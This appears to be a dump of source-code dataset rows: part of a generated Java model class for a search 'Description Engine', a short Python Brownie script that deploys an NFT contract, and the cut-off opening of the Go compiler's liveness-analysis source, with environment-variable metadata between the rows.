}
String contentPath = PersistenceUtil.resolveRelativePath(p_localPath,
new Path(p_contentPath));
if (modelRoot.isNewCompareRoot()) {
// for comparisons we do not want to change
// the content path
contentPath = p_contentPath;
}
if (new_inst != null && !modelRoot.isCompareRoot()) {
PersistableModelComponent pmc = new_inst.getPersistableComponent();
if (pmc == null) {
// dangling reference, redo this instance
new_inst.batchUnrelate();
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
new_inst.m_id = IdAssigner.preprocessUUID(p_m_id);
}
}
if (new_inst == null) {
// there is no instance matching the id, create a proxy
// if the resource doesn't exist then this will be a dangling reference
new_inst = new DescriptionEngine_c(modelRoot, p_m_id);
new_inst.m_contentPath = contentPath;
}
return new_inst;
}
static public DescriptionEngine_c resolveInstance(ModelRoot modelRoot,
java.util.UUID p_m_id) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
DescriptionEngine_c source = null;
synchronized (instances) {
Object[] key = {p_m_id};
source = (DescriptionEngine_c) instances.get(key);
if (source != null && !modelRoot.isCompareRoot()) {
source.convertFromProxy();
source.batchUnrelate();
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
source.m_id = IdAssigner.preprocessUUID(p_m_id);
return source;
}
}
// there is no instance matching the id
DescriptionEngine_c new_inst = new DescriptionEngine_c(modelRoot,
p_m_id);
return new_inst;
}
public DescriptionEngine_c(ModelRoot modelRoot) {
super(modelRoot);
m_id = IdAssigner.NULL_UUID;
Object[] key = {m_id};
addInstanceToMap(key);
}
public Object getInstanceKey() {
Object[] key = {m_id};
return key;
}
public boolean setInstanceKey(UUID p_newKey) {
boolean changed = false;
// round p1
// round p2
// round p3
// round p4
// round p5
if (m_id != p_newKey) {
m_id = p_newKey;
changed = true;
}
return changed;
}
public boolean equals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
// check that the model-roots are the same
if (((NonRootModelElement) elem).getModelRoot() != getModelRoot()) {
return false;
}
return identityEquals(elem);
}
public boolean identityEquals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
DescriptionEngine_c me = (DescriptionEngine_c) elem;
// don't allow an empty id-value to produce a false positive result;
// in this case, use whether the two instances are actually the same
// one in memory, instead
if ((IdAssigner.NULL_UUID.equals(getId()) || IdAssigner.NULL_UUID
.equals(((DescriptionEngine_c) elem).getId())) && this != elem) {
return false;
}
if (!getId().equals(((DescriptionEngine_c) elem).getId()))
return false;
return true;
}
public boolean cachedIdentityEquals(Object elem) {
if (!(elem instanceof DescriptionEngine_c)) {
return false;
}
DescriptionEngine_c me = (DescriptionEngine_c) elem;
if (!getIdCachedValue().equals(
((DescriptionEngine_c) elem).getIdCachedValue()))
return false;
return true;
}
// Attributes
private java.util.UUID m_id;
// declare association references from this class
// referring navigation
SearchEngine_c IsSupertypeSearchEngine;
public void relateAcrossR9501To(SearchEngine_c target) {
relateAcrossR9501To(target, true);
}
public void relateAcrossR9501To(SearchEngine_c target, boolean notifyChanges) {
if (target == null)
return;
if (target == IsSupertypeSearchEngine)
return; // already related
if (IsSupertypeSearchEngine != target) {
Object oldKey = getInstanceKey();
if (IsSupertypeSearchEngine != null) {
IsSupertypeSearchEngine.clearBackPointerR9501To(this);
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == true) { //$NON-NLS-1$
Ooaofooa.log
.println(
ILogger.CONSISTENCY,
"DescriptionEngine_c.relateAcrossR9501To(SearchEngine_c target)",
"Relate performed across R9501 from Description Engine to Search Engine without unrelate of prior instance.");
}
}
IsSupertypeSearchEngine = target;
m_id = target.getId();
updateInstanceKey(oldKey, getInstanceKey());
target.setBackPointerR9501To(this);
target.addRef();
if (notifyChanges) {
RelationshipChangeModelDelta change = new RelationshipChangeModelDelta(
Modeleventnotification_c.DELTA_ELEMENT_RELATED, this,
target, "9501", "");
Ooaofooa.getDefaultInstance().fireModelElementRelationChanged(
change);
}
}
}
public void unrelateAcrossR9501From(SearchEngine_c target) {
unrelateAcrossR9501From(target, true);
}
public void unrelateAcrossR9501From(SearchEngine_c target,
boolean notifyChanges) {
if (target == null)
return;
if (IsSupertypeSearchEngine == null)
return; // already unrelated
if (target != IsSupertypeSearchEngine) {
Exception e = new Exception();
e.fillInStackTrace();
CorePlugin.logError(
"Tried to unrelate from non-related instance across R9501",
e);
return;
}
if (target != null) {
target.clearBackPointerR9501To(this);
}
if (IsSupertypeSearchEngine != null) {
m_id = IsSupertypeSearchEngine.getId();
IsSupertypeSearchEngine = null;
target.removeRef();
if (notifyChanges) {
RelationshipChangeModelDelta change = new RelationshipChangeModelDelta(
Modeleventnotification_c.DELTA_ELEMENT_UNRELATED, this,
target, "9501", "");
Ooaofooa.getDefaultInstance().fireModelElementRelationChanged(
change);
}
}
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c[] targets) {
return getOneSEN_DEOnR9501(targets, null);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test) {
DescriptionEngine_c ret_val = null;
if (targets != null) {
for (int i = 0; i < targets.length && ret_val == null; ++i) {
ret_val = getOneSEN_DEOnR9501(targets[i], test);
}
}
return ret_val;
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(SearchEngine_c target) {
return getOneSEN_DEOnR9501(target, null);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c target, boolean loadComponent) {
return getOneSEN_DEOnR9501(target.getModelRoot(), target, null,
loadComponent);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(
SearchEngine_c target, ClassQueryInterface_c test) {
if (target != null) {
return getOneSEN_DEOnR9501(target.getModelRoot(), target, test);
}
return null;
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(ModelRoot modelRoot,
SearchEngine_c target, ClassQueryInterface_c test) {
return getOneSEN_DEOnR9501(modelRoot, target, test, true);
}
public static DescriptionEngine_c getOneSEN_DEOnR9501(ModelRoot modelRoot,
SearchEngine_c target, ClassQueryInterface_c test,
boolean loadComponent) {
return find_getOneSEN_DEOnR9501(modelRoot, target, test);
}
private static DescriptionEngine_c find_getOneSEN_DEOnR9501(
ModelRoot modelRoot, SearchEngine_c target,
ClassQueryInterface_c test) {
if (target != null) {
DescriptionEngine_c source = (DescriptionEngine_c) target.backPointer_IsSubtypeDescriptionEngineIsSubtype_R9501;
if (source != null && (test == null || test.evaluate(source))) {
return source;
}
}
// not found
return null;
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets) {
return getManySEN_DEsOnR9501(targets, null);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, boolean loadComponent) {
return getManySEN_DEsOnR9501(targets, null, loadComponent);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test) {
return getManySEN_DEsOnR9501(targets, test, true);
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c[] targets, ClassQueryInterface_c test,
boolean loadComponent) {
if (targets == null || targets.length == 0 || targets[0] == null)
return new DescriptionEngine_c[0];
ModelRoot modelRoot = targets[0].getModelRoot();
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
Vector matches = new Vector();
for (int i = 0; i < targets.length; i++) {
DescriptionEngine_c source = (DescriptionEngine_c) targets[i].backPointer_IsSubtypeDescriptionEngineIsSubtype_R9501;
if (source != null && (test == null || test.evaluate(source))) {
matches.add(source);
}
}
if (matches.size() > 0) {
DescriptionEngine_c[] ret_set = new DescriptionEngine_c[matches
.size()];
matches.copyInto(ret_set);
return ret_set;
} else {
return new DescriptionEngine_c[0];
}
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c target) {
if (target != null) {
SearchEngine_c[] targetArray = new SearchEngine_c[1];
targetArray[0] = target;
return getManySEN_DEsOnR9501(targetArray);
} else {
DescriptionEngine_c[] result = new DescriptionEngine_c[0];
return result;
}
}
public static DescriptionEngine_c[] getManySEN_DEsOnR9501(
SearchEngine_c target, boolean loadComponent) {
if (target != null) {
SearchEngine_c[] targetArray = new SearchEngine_c[1];
targetArray[0] = target;
return getManySEN_DEsOnR9501(targetArray, loadComponent);
} else {
DescriptionEngine_c[] result = new DescriptionEngine_c[0];
return result;
}
}
public void batchRelate(ModelRoot modelRoot, boolean notifyChanges,
boolean searchAllRoots) {
batchRelate(modelRoot, false, notifyChanges, searchAllRoots);
}
public void batchRelate(ModelRoot modelRoot, boolean relateProxies,
boolean notifyChanges, boolean searchAllRoots) {
InstanceList instances = null;
ModelRoot baseRoot = modelRoot;
// R9501
SearchEngine_c relInst39126 = (SearchEngine_c) baseRoot
.getInstanceList(SearchEngine_c.class).get(new Object[]{m_id});
// if there was no local element, check for any global elements
// failing that proceed to check other model roots
if (relInst39126 == null) {
relInst39126 = (SearchEngine_c) Ooaofooa.getDefaultInstance()
.getInstanceList(SearchEngine_c.class)
.get(new Object[]{m_id});
}
if (relInst39126 == null && searchAllRoots && !baseRoot.isCompareRoot()) {
Ooaofooa[] roots = Ooaofooa.getInstances();
for (int i = 0; i < roots.length; i++) {
if (roots[i].isCompareRoot()) {
// never use elements from any compare root
continue;
}
relInst39126 = (SearchEngine_c) roots[i].getInstanceList(
SearchEngine_c.class).get(new Object[]{m_id});
if (relInst39126 != null)
break;
}
}
//synchronized
if (relInst39126 != null) {
if (relateProxies || !isProxy()
|| (inSameComponent(this, relInst39126) && !isProxy())) {
relInst39126.relateAcrossR9501To(this, notifyChanges);
}
}
}
public void batchUnrelate(boolean notifyChanges) {
NonRootModelElement inst = null;
// R9501
// SEN_E
inst = IsSupertypeSearchEngine;
unrelateAcrossR9501From(IsSupertypeSearchEngine, notifyChanges);
if (inst != null) {
inst.removeRef();
}
}
public static void batchRelateAll(ModelRoot modelRoot,
boolean notifyChanges, boolean searchAllRoots) {
batchRelateAll(modelRoot, notifyChanges, searchAllRoots, false);
}
public static void batchRelateAll(ModelRoot modelRoot, boolean notifyChanges, boolean searchAllRoots, boolean relateProxies)
{
InstanceList instances = modelRoot.getInstanceList(DescriptionEngine_c.class);
synchronized(instances) {
Iterator<NonRootModelElement> cursor = instances.iterator() ;
while (cursor.hasNext())
{
final DescriptionEngine_c inst = (DescriptionEngine_c)cursor.next() ;
inst.batchRelate(modelRoot, relateProxies, notifyChanges, searchAllRoots );
}
}
}
public static void clearInstances(ModelRoot modelRoot) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
synchronized (instances) {
for (int i = instances.size() - 1; i >= 0; i--) {
((NonRootModelElement) instances.get(i)).delete_unchecked();
}
}
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
DescriptionEngine_c result = findDescriptionEngineInstance(modelRoot,
test, loadComponent);
if (result == null && loadComponent) {
List pmcs = PersistenceManager.findAllComponents(modelRoot,
DescriptionEngine_c.class);
for (int i = 0; i < pmcs.size(); i++) {
PersistableModelComponent component = (PersistableModelComponent) pmcs
.get(i);
if (!component.isLoaded()) {
try {
component.load(new NullProgressMonitor());
result = findDescriptionEngineInstance(modelRoot, test,
loadComponent);
if (result != null)
return result;
} catch (Exception e) {
CorePlugin.logError("Error Loading component", e);
}
}
}
}
if (result != null && loadComponent) {
result.loadProxy();
}
return result;
}
private static DescriptionEngine_c findDescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
synchronized (instances) {
for (int i = 0; i < instances.size(); ++i) {
DescriptionEngine_c x = (DescriptionEngine_c) instances.get(i);
if (test == null || test.evaluate(x)) {
if (x.ensureLoaded(loadComponent))
return x;
}
}
}
return null;
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot, ClassQueryInterface_c test) {
return DescriptionEngineInstance(modelRoot, test, true);
}
public static DescriptionEngine_c DescriptionEngineInstance(
ModelRoot modelRoot) {
return DescriptionEngineInstance(modelRoot, null, true);
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot, ClassQueryInterface_c test,
boolean loadComponent) {
if (loadComponent) {
PersistenceManager.ensureAllInstancesLoaded(modelRoot,
DescriptionEngine_c.class);
}
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
Vector matches = new Vector();
synchronized (instances) {
for (int i = 0; i < instances.size(); ++i) {
DescriptionEngine_c x = (DescriptionEngine_c) instances.get(i);
if (test == null || test.evaluate(x)) {
if (x.ensureLoaded(loadComponent))
matches.add(x);
}
}
if (matches.size() > 0) {
DescriptionEngine_c[] ret_set = new DescriptionEngine_c[matches
.size()];
matches.copyInto(ret_set);
return ret_set;
} else {
return new DescriptionEngine_c[0];
}
}
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot, ClassQueryInterface_c test) {
return DescriptionEngineInstances(modelRoot, test, true);
}
public static DescriptionEngine_c[] DescriptionEngineInstances(
ModelRoot modelRoot) {
return DescriptionEngineInstances(modelRoot, null, true);
}
public boolean delete() {
boolean result = super.delete();
boolean delete_error = false;
String errorMsg = "The following relationships were not torn down by the Description Engine.dispose call: ";
SearchEngine_c testR9501Inst2 = SearchEngine_c.getOneSEN_EOnR9501(this,
false);
if (testR9501Inst2 != null) {
delete_error = true;
errorMsg = errorMsg + "9501 ";
}
if (delete_error == true) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log.println(ILogger.DELETE, "Description Engine",
errorMsg);
} else {
Exception e = new Exception();
e.fillInStackTrace();
CorePlugin.logError(errorMsg, e);
}
}
return result;
}
// end declare instance pool
// declare attribute accessors
public boolean isUUID(String attributeName) {
if (attributeName.equals("id")) {
return true;
}
return false;
}
public String getCompUniqueID() {
UUID tempID = null;
long longID = 0L;
StringBuffer result = new StringBuffer();
tempID = getId();
if (IdAssigner.NULL_UUID.equals(tempID))
tempID = getIdCachedValue();
result.append(Long.toHexString(tempID.getMostSignificantBits()));
result.append(Long.toHexString(tempID.getLeastSignificantBits()));
return result.toString();
}
// declare attribute accessors
public long getIdLongBased() {
if (IsSupertypeSearchEngine != null) {
return IsSupertypeSearchEngine.getIdLongBased();
}
return 0;
}
public java.util.UUID getId() {
if (IsSupertypeSearchEngine != null) {
return IsSupertypeSearchEngine.getId();
}
return IdAssigner.NULL_UUID;
}
public boolean hasSuperType() {
return (IsSupertypeSearchEngine != null);
}
public java.util.UUID getIdCachedValue() {
if (!IdAssigner.NULL_UUID.equals(m_id))
return m_id;
else
return getId();
}
public void setId(java.util.UUID newValue) {
if (newValue != null) {
if (newValue.equals(m_id)) {
return;
}
} else if (m_id != null) {
if (m_id.equals(newValue)) {
return;
}
} else {
return;
}
AttributeChangeModelDelta change = new AttributeChangeModelDelta(
Modeleventnotification_c.DELTA_ATTRIBUTE_CHANGE, this, "Id",
m_id, newValue, true);
m_id = IdAssigner.preprocessUUID(newValue);
Ooaofooa.getDefaultInstance().fireModelElementAttributeChanged(change);
}
// end declare accessors
public static void checkClassConsistency(ModelRoot modelRoot) {
Ooaofooa.log
.println(ILogger.OPERATION, "Description Engine", //$NON-NLS-1$
" Operation entered: Description Engine::checkClassConsistency"); //$NON-NLS-1$
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == false) { //$NON-NLS-1$
return;
}
DescriptionEngine_c[] objs = DescriptionEngine_c
.DescriptionEngineInstances(modelRoot, null, false);
for (int i = 0; i < objs.length; i++) {
objs[i].checkConsistency();
}
}
public boolean checkConsistency() {
Ooaofooa.log.println(ILogger.OPERATION, "Description Engine", //$NON-NLS-1$
" Operation entered: Description Engine::checkConsistency"); //$NON-NLS-1$
if (Boolean.valueOf(System.getenv("PTC_MCC_ENABLED")) == false) { //$NON-NLS-1$
return true;
}
ModelRoot modelRoot = getModelRoot();
boolean retval = true;
class DescriptionEngine_c_test39128_c implements ClassQueryInterface_c {
DescriptionEngine_c_test39128_c(java.util.UUID p39129) {
m_p39129 = p39129;
}
private java.util.UUID m_p39129;
public boolean evaluate(Object candidate) {
DescriptionEngine_c selected = (DescriptionEngine_c) candidate;
boolean retval = false;
retval = (selected.getId().equals(m_p39129));
return retval;
}
}
DescriptionEngine_c[] objs39127 = DescriptionEngine_c
.DescriptionEngineInstances(modelRoot,
new DescriptionEngine_c_test39128_c(getId()));
if (((objs39127.length) == 0)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Cardinality of an identifier is zero. " //$NON-NLS-1$
+ "Actual Value: " + Integer.toString(objs39127.length)); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Cardinality of an identifier is zero. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length), e);
}
retval = false;
}
if (((objs39127.length) > 1)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Cardinality of an identifier is greater than 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length)
+ " Id: " + "Not Printable"); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Cardinality of an identifier is greater than 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39127.length)
+ " Id: " + "Not Printable", e); //$NON-NLS-1$
}
retval = false;
}
// Description Engine is a subtype in association: rel.Numb = 9501
// The supertype class is: Search Engine
class SearchEngine_c_test39133_c implements ClassQueryInterface_c {
SearchEngine_c_test39133_c(java.util.UUID p39134) {
m_p39134 = p39134;
}
private java.util.UUID m_p39134;
public boolean evaluate(Object candidate) {
SearchEngine_c selected = (SearchEngine_c) candidate;
boolean retval = false;
retval = (selected.getId().equals(m_p39134));
return retval;
}
}
SearchEngine_c[] objs39132 = SearchEngine_c.SearchEngineInstances(
modelRoot, new SearchEngine_c_test39133_c(getId()));
if (((objs39132.length) != 1)) {
if (CorePlugin.getDefault().isDebugging()) {
Ooaofooa.log
.println(ILogger.CONSISTENCY,
"Description Engine", //$NON-NLS-1$
"Consistency: Object: Description Engine: Association: 9501: Cardinality of a supertype is not equal to 1. " //$NON-NLS-1$
+ "Actual Value: " + Integer.toString(objs39132.length)); //$NON-NLS-1$
} else {
Exception e = new Exception();
CorePlugin
.logError(
"Consistency: Object: Description Engine: Association: 9501: Cardinality of a supertype is not equal to 1. " //$NON-NLS-1$
+ "Actual Value: " //$NON-NLS-1$
+ Integer.toString(objs39132.length), e);
}
retval = false;
}
return retval;
}
// declare transform functions
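	// Processquery scans every description searchable participant attached to
	// this engine's search engine, records a SearchResult/Match/ContentMatch
	// for each occurrence of the query pattern in the participant's searchable
	// value, and stops early if the monitor reports cancellation.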
public void Processquery(final Object p_Monitor,
final java.util.UUID p_Queryid) {
Ooaofooa.log.println(ILogger.OPERATION, "Description Engine",
" Operation entered: DescriptionEngine::Processquery");
final ModelRoot modelRoot = getModelRoot();
Query_c v_query = (Query_c) modelRoot.getInstanceList(Query_c.class)
.getGlobal(null, p_Queryid);
SearchEngine_c v_engine = SearchEngine_c.getOneSEN_EOnR9501(this);
SearchParticipant_c[] v_participants = SearchParticipant_c
.getManySP_SPsOnR9502(v_engine);
SearchParticipant_c v_participant = null;
for (int i36657 = 0; i36657 < v_participants.length; i36657++) {
v_participant = v_participants[i36657];
DescriptionSearchable_c v_descriptionParticipant = DescriptionSearchable_c
.getOneSP_DSOnR9702(SearchableElement_c
.getOneSP_SEOnR9700(v_participant));
if (((v_descriptionParticipant != null))) {
SearchResult_c v_searchResult = (SearchResult_c) modelRoot
.getInstanceList(SearchResult_c.class).getGlobal(null,
Gd_c.Null_unique_id());
String v_contents = v_descriptionParticipant
.getSearchablevalue();
int v_result = 0;
while ((v_result >= 0)) {
java.util.UUID v_matchResultId = Search_c
.Locatecontentresults(v_contents,
v_query.getCasesensitive(),
v_query.getPattern());
ContentMatchResult_c v_matchResult = (ContentMatchResult_c) modelRoot
.getInstanceList(ContentMatchResult_c.class)
.getGlobal(null, v_matchResultId);
if (((v_matchResult != null))) {
v_result = v_matchResult.getStartposition();
if ((v_result >= 0)) {
if (((v_searchResult == null))) {
v_searchResult = new SearchResult_c(modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_searchResult));
if (v_searchResult != null) {
v_searchResult
.relateAcrossR9503To(v_engine);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_searchResult != null) {
v_searchResult
.relateAcrossR9802To(v_participant);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
}
Match_c v_match = new Match_c(modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_match));
ContentMatch_c v_contentMatch = new ContentMatch_c(
modelRoot);
Ooaofooa.getDefaultInstance()
.fireModelElementCreated(
new BaseModelDelta(
Modeleventnotification_c.DELTA_NEW,
v_contentMatch));
if (v_match != null) {
v_match.relateAcrossR9801To(v_contentMatch);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_searchResult != null) {
v_searchResult.relateAcrossR9800To(v_match);
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Relate attempted on null left hand instance.",
t);
}
if (v_contentMatch != null) {
v_contentMatch.setStartposition(v_matchResult
.getStartposition());
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Attribute write attempted on null instance.",
t);
}
if (v_contentMatch != null) {
v_contentMatch.setMatchlength(v_matchResult
.getLength());
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Attribute write attempted on null instance.",
t);
}
if (v_matchResult != null) {
// get the location of this element in the instance list
// before deleting
if (v_matchResult.delete()) {
Ooaofooa.getDefaultInstance()
.fireModelElementDeleted(
new BaseModelDelta(
Modeleventnotification_c.DELTA_DELETE,
v_matchResult));
}
} else {
Throwable t = new Throwable();
t.fillInStackTrace();
CorePlugin
.logError(
"Delete attempted on null instance.",
t);
}
Search_c.Matchcreated(v_match.Converttoinstance());
}
}
else {
v_result = -1;
}
if ((Search_c.Monitorcanceled(p_Monitor))) {
Search_c.Clearquerydata();
return;
}
}
Search_c.Clearquerydata();
}
}
} // End processQuery
// end transform functions
public Object getAdapter(Class adapter) {
Object superAdapter = super.getAdapter(adapter);
if (superAdapter != null) {
return superAdapter;
}
return null;
}
} // end Description Engine
| [
"\"PTC_MCC_ENABLED\"",
"\"PTC_MCC_ENABLED\"",
"\"PTC_MCC_ENABLED\""
]
| []
| [
"PTC_MCC_ENABLED"
]
| [] | ["PTC_MCC_ENABLED"] | java | 1 | 0 | |
scripts/deploy_nft.py | from brownie import nft
import os
from scripts.scripts import *
def main():
deploy(os.getenv("TOKEN_NAME"), os.getenv("TOKEN_SYMBOL"))
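# deploy() pushes the NFT contract with the given name and symbol from the
# account returned by get_account(); whether the source is published for
# explorer verification is controlled by the get_publish_source() helper.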
def deploy(name, symbol):
acc = get_account()
contract = nft.deploy(
name, symbol, {"from": acc}, publish_source=get_publish_source()
)
print(
        f'NFT "{contract.name()} ({contract.symbol()})" deployed to {get_network()} network!'
)
| []
| []
| [
"TOKEN_NAME",
"TOKEN_SYMBOL"
]
| [] | ["TOKEN_NAME", "TOKEN_SYMBOL"] | python | 2 | 0 | |
src/cmd/compile/internal/gc/plive.go | // Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Garbage collector liveness bitmap generation.
// The command line flag -live causes this code to print debug information.
// The levels are:
//
// -live (aka -live=1): print liveness lists as code warnings at safe points
// -live=2: print an assembly listing with liveness annotations
//
// Each level includes the earlier output as well.
package gc
import (
"cmd/compile/internal/ssa"
"cmd/compile/internal/types"
"cmd/internal/obj"
"cmd/internal/objabi"
"cmd/internal/src"
"crypto/md5"
"crypto/sha1"
"fmt"
"os"
"strings"
)
// TODO(mdempsky): Update to reference OpVar{Def,Kill,Live} instead.
// VARDEF is an annotation for the liveness analysis, marking a place
// where a complete initialization (definition) of a variable begins.
// Since the liveness analysis can see initialization of single-word
// variables quite easily, gvardef is usually only called for multi-word
// or 'fat' variables, those satisfying isfat(n->type).
// However, gvardef is also called when a non-fat variable is initialized
// via a block move; the only time this happens is when you have
// return f()
// for a function with multiple return values exactly matching the return
// types of the current function.
//
// A 'VARDEF x' annotation in the instruction stream tells the liveness
// analysis to behave as though the variable x is being initialized at that
// point in the instruction stream. The VARDEF must appear before the
// actual (multi-instruction) initialization, and it must also appear after
// any uses of the previous value, if any. For example, if compiling:
//
// x = x[1:]
//
// it is important to generate code like:
//
// base, len, cap = pieces of x[1:]
// VARDEF x
// x = {base, len, cap}
//
// If instead the generated code looked like:
//
// VARDEF x
// base, len, cap = pieces of x[1:]
// x = {base, len, cap}
//
// then the liveness analysis would decide the previous value of x was
// unnecessary even though it is about to be used by the x[1:] computation.
// Similarly, if the generated code looked like:
//
// base, len, cap = pieces of x[1:]
// x = {base, len, cap}
// VARDEF x
//
// then the liveness analysis will not preserve the new value of x, because
// the VARDEF appears to have "overwritten" it.
//
// VARDEF is a bit of a kludge to work around the fact that the instruction
// stream is working on single-word values but the liveness analysis
// wants to work on individual variables, which might be multi-word
// aggregates. It might make sense at some point to look into letting
// the liveness analysis work on single-word values as well, although
// there are complications around interface values, slices, and strings,
// all of which cannot be treated as individual words.
//
// VARKILL is the opposite of VARDEF: it marks a value as no longer needed,
// even if its address has been taken. That is, a VARKILL annotation asserts
// that its argument is certainly dead, for use when the liveness analysis
// would not otherwise be able to deduce that fact.
// BlockEffects summarizes the liveness effects on an SSA block.
type BlockEffects struct {
lastbitmapindex int // for livenessepilogue
// Computed during livenessprologue using only the content of
// individual blocks:
//
// uevar: upward exposed variables (used before set in block)
// varkill: killed variables (set in block)
// avarinit: addrtaken variables set or used (proof of initialization)
uevar bvec
varkill bvec
avarinit bvec
// Computed during livenesssolve using control flow information:
//
// livein: variables live at block entry
// liveout: variables live at block exit
// avarinitany: addrtaken variables possibly initialized at block exit
// (initialized in block or at exit from any predecessor block)
// avarinitall: addrtaken variables certainly initialized at block exit
// (initialized in block or at exit from all predecessor blocks)
livein bvec
liveout bvec
avarinitany bvec
avarinitall bvec
}
// A collection of global state used by liveness analysis.
type Liveness struct {
fn *Node
f *ssa.Func
vars []*Node
idx map[*Node]int32
stkptrsize int64
be []BlockEffects
// stackMapIndex maps from safe points (i.e., CALLs) to their
// index within the stack maps.
stackMapIndex map[*ssa.Value]int
// An array with a bit vector for each safe point tracking live variables.
livevars []bvec
cache progeffectscache
}
type progeffectscache struct {
textavarinit []int32
retuevar []int32
tailuevar []int32
initialized bool
}
// livenessShouldTrack reports whether the liveness analysis
// should track the variable n.
// We don't care about variables that have no pointers,
// nor do we care about non-local variables,
// nor do we care about empty structs (handled by the pointer check),
// nor do we care about the fake PAUTOHEAP variables.
func livenessShouldTrack(n *Node) bool {
return n.Op == ONAME && (n.Class() == PAUTO || n.Class() == PPARAM || n.Class() == PPARAMOUT) && types.Haspointers(n.Type)
}
// getvariables returns the list of on-stack variables that we need to track
// and a map for looking up indices by *Node.
func getvariables(fn *Node) ([]*Node, map[*Node]int32) {
var vars []*Node
for _, n := range fn.Func.Dcl {
if livenessShouldTrack(n) {
vars = append(vars, n)
}
}
idx := make(map[*Node]int32, len(vars))
for i, n := range vars {
idx[n] = int32(i)
}
return vars, idx
}
func (lv *Liveness) initcache() {
if lv.cache.initialized {
Fatalf("liveness cache initialized twice")
return
}
lv.cache.initialized = true
for i, node := range lv.vars {
switch node.Class() {
case PPARAM:
// A return instruction with a p.to is a tail return, which brings
// the stack pointer back up (if it ever went down) and then jumps
// to a new function entirely. That form of instruction must read
// all the parameters for correctness, and similarly it must not
// read the out arguments - they won't be set until the new
// function runs.
lv.cache.tailuevar = append(lv.cache.tailuevar, int32(i))
if node.Addrtaken() {
lv.cache.textavarinit = append(lv.cache.textavarinit, int32(i))
}
case PPARAMOUT:
// If the result had its address taken, it is being tracked
// by the avarinit code, which does not use uevar.
// If we added it to uevar too, we'd not see any kill
// and decide that the variable was live entry, which it is not.
// So only use uevar in the non-addrtaken case.
// The p.to.type == obj.TYPE_NONE limits the bvset to
// non-tail-call return instructions; see note below for details.
if !node.Addrtaken() {
lv.cache.retuevar = append(lv.cache.retuevar, int32(i))
}
}
}
}
// A liveEffect is a set of flags that describe an instruction's
// liveness effects on a variable.
//
// The possible flags are:
// uevar - used by the instruction
// varkill - killed by the instruction
// for variables without address taken, means variable was set
// for variables with address taken, means variable was marked dead
// avarinit - initialized or referred to by the instruction,
// only for variables with address taken but not escaping to heap
//
// The avarinit output serves as a signal that the data has been
// initialized, because any use of a variable must come after its
// initialization.
type liveEffect int
const (
uevar liveEffect = 1 << iota
varkill
avarinit
)
// valueEffects returns the index of a variable in lv.vars and the
// liveness effects v has on that variable.
// If v does not affect any tracked variables, it returns -1, 0.
func (lv *Liveness) valueEffects(v *ssa.Value) (int32, liveEffect) {
n, e := affectedNode(v)
if e == 0 || n == nil || n.Op != ONAME { // cheapest checks first
return -1, 0
}
// AllocFrame has dropped unused variables from
